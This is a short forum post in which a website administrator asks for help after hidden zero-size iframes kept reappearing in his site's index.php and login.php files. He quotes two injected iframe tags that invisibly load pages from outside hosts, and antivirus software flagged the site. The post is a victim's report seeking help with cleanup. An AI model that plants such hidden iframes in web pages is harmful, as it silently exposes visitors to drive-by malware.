hi… i am the web admin from site
http://ppi-koeln.de/
recently i found that an iframe was added to the bottom of index.php and login.php
before it was this
<iframe src="http://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
i deleted it,
and after few days, this iframe was there again…
i deleted it, and i send email to the owner of individualpeople.biz
got no response…
oh yeah, and some friends of mine that use windows tell that when they open the site, antivirus tell that there’s a virus
and now this code is added
<iframe src="http://fifa-09.cn/1/index.php" width="0" height="0" style="display:none"></iframe>
i havent delete this one, you can see and check the source…
after a few search, i found that index.php and login.php in subfolder /m/ are changed too,
and that frame was also added to the bottom of the file…
please help…
i think someone use bot or something,because it only affects index.php and login.php
it looks like an automated process…
sorry for my bad english